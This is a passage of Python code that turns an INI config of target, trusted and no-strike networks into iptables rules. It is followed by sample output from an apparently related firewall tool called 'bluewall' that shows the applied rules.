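    sections: Dict[str, Dict[str, List[str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def build_rules(cfg: Dict[str, Dict[str, List[str]]]) -> List[Rule]:
    fw = cfg.get("firewall_config", {})

    def nets(*keys: str) -> List[Net]:
        return [ipaddress.ip_network(v, strict=False) for k in keys for v in fw.get(k, [])]

    nostrike = nets("nostrike")
    targets = nets("target_range", "target_host")
    trusted = nets("trusted_range", "trusted_host")
    rules: List[Rule] = []
    # 1. No-strike DROPs go first: a later ACCEPT for an enclosing range
    #    (192.168.2.0/24 here) can then never override them.
    for n in nostrike:
        rules += [Rule("INPUT", n, "DROP"), Rule("OUTPUT", n, "DROP")]
    # 2. Loopback.
    lo = ipaddress.ip_network("127.0.0.0/8")
    rules += [Rule("INPUT", lo, "ACCEPT"), Rule("OUTPUT", lo, "ACCEPT")]
    # 3. Trusted hosts/ranges may initiate connections to us.
    for t in trusted:
        for proto in ("tcp", "udp"):
            rules.append(Rule("INPUT", t, "ACCEPT", proto))
    # 4. We may initiate connections to targets and trusted hosts.
    for net in targets + trusted:
        for proto in ("tcp", "udp", "icmp"):
            rules.append(Rule("OUTPUT", net, "ACCEPT", proto))
    return rules


def render(rule: Rule) -> str:
    """Render one Rule as an iptables command (chain policies are set separately)."""
    parts = ["iptables", "-A", rule.chain]
    if rule.proto != "all":
        parts += ["-p", rule.proto]
    if rule.net is not None:
        parts += ["-s" if rule.chain == "INPUT" else "-d", str(rule.net)]
    parts += ["-j", rule.action]
    return " ".join(parts)


def decide(rules: List[Rule], chain: str, peer_ip: str, proto: str = "tcp",
           policy: str = "DROP") -> str:
    """First-match evaluation of a packet to/from peer_ip, as iptables does it."""
    ip = ipaddress.ip_address(peer_ip)
    for r in rules:
        if r.chain != chain or r.proto not in ("all", proto):
            continue
        if r.net is not None and ip not in r.net:
            continue
        return r.action
    return policy


if __name__ == "__main__":
    for rule in build_rules(parse_config(SAMPLE_CONFIG)):
        print(render(rule))
```

decide() defaults to DROP to match the "policy DROP" chains in the output below; when applying the rendered rules for real, set the chain policies (iptables -P INPUT DROP and so on) after the rules are in place, and re-run decide() against every nostrike address whenever a range is added, since a nostrike that sits inside a trusted range is only protected by the rule order.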

Output
[ataylor@localhost bluewall]$ sudo bluewall -c configs/exampleconfig.ini 
[OK] 192.168.1.101 is a valid setting for dns
[OK] 192.168.1.1 is a valid setting for gateway_addr
[OK] 24 is a valid setting for cidr_prefix
[OK] 192.168.1.254 is a valid setting for nostrike
[OK] * is a valid setting for rh_mac
[OK] WINtaylor is a valid setting for win_host
[OK] 192.168.2.0/24 is a valid setting for target_range
[OK] 192.168.3.0/24 is a valid setting for target_range
[OK] 192.168.1.30 is a valid setting for rh_ipaddr
[OK] RHEL-taylor is a valid setting for rh_host
[OK] 42.42.42.42 is a valid setting for trusted_host
[OK] 192.168.1.0/24 is a valid setting for trusted_range
[OK] 192.168.1.50 is a valid setting for win_ipaddr
==============================

[VALID CONFIG] No Errors Detected.

CONFIGURING
writing eth config to /etc/sysconfig/network-scripts/ifcfg-ens33
[CONFIGURATION]
TYPE="Ethernet"
BOOTPROTO=none
NAME=ens33
DEVICE="ens33"
ONBOOT=no
DEFROUTE="yes"
IPV4_FAILURE_FATAL=no
DNS1=192.168.1.101
IPADDR=192.168.1.30
PREFIX=24
GATEWAY=192.168.1.1
MACADDR=00:16:3E:52:7F:8D

[+] Interface ens33 shutdown.
[+] Restarting Network Service
[+] Interface ens33 brought up.
[+] Rules Flushed!
[+] Allowing outbound ICMP/traceroute to 192.168.2.0/24...
[+] Allowing outbound ICMP/traceroute to 192.168.3.0/24...
[+] Allowing outbound ICMP/traceroute to 192.168.1.0/24...
[+] Limiting outbound TCP connections to 192.168.2.0/24.
[+] Limiting outbound TCP connections to 192.168.3.0/24.
[+] Limiting outbound TCP connections to 192.168.1.0/24.
[+] Limiting outbound UDP connections to 192.168.2.0/24.
[+] Limiting outbound UDP connections to 192.168.3.0/24.
[+] Limiting outbound UDP connections to 192.168.1.0/24.
[+] Limiting inbound UDP connections to 192.168.1.0/24.
[+] Limiting inbound TCP connections to 192.168.1.0/24.
[+] Allowing traffic for localhost.
[+] 192.168.1.254 applied to NOSTRIKE
$ iptables -nvL
Chain INPUT (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 192.168.1.254 0.0.0.0/0
0 0 ACCEPT all -- * * 127.0.0.0/8 127.0.0.0/8
0 0 ACCEPT tcp -- * * 0.0.0.0/0 192.168.1.0/24
0 0 ACCEPT udp -- * * 0.0.0.0/0 192.168.1.0/24

Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.1.254
0 0 ACCEPT all -- * * 127.0.0.0/8 127.0.0.0/8
0 0 ACCEPT udp -- * * 0.0.0.0/0 192.168.1.0/24
0 0 ACCEPT udp -- * * 0.0.0.0/0 192.168.3.0/24
0 0 ACCEPT udp -- * * 0.0.0.0/0 192.168.2.0/24
0 0 ACCEPT tcp -- * * 0.0.0.0/0 192.168.1.0/24
0 0 ACCEPT tcp -- * * 0.0.0.0/0 192.168.3.0/24
0 0 ACCEPT tcp -- * * 0.0.0.0/0 192.168.2.0/24
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.1.0/24 icmptype 0
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.1.0/24 icmptype 8
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.3.0/24 icmptype 0
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.3.0/24 icmptype 8
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.2.0/24 icmptype 0
0 0 ACCEPT icmp -- * * 0.0.0.0/0 192.168.2.0/24 icmptype 8

[+] Setup Complete.

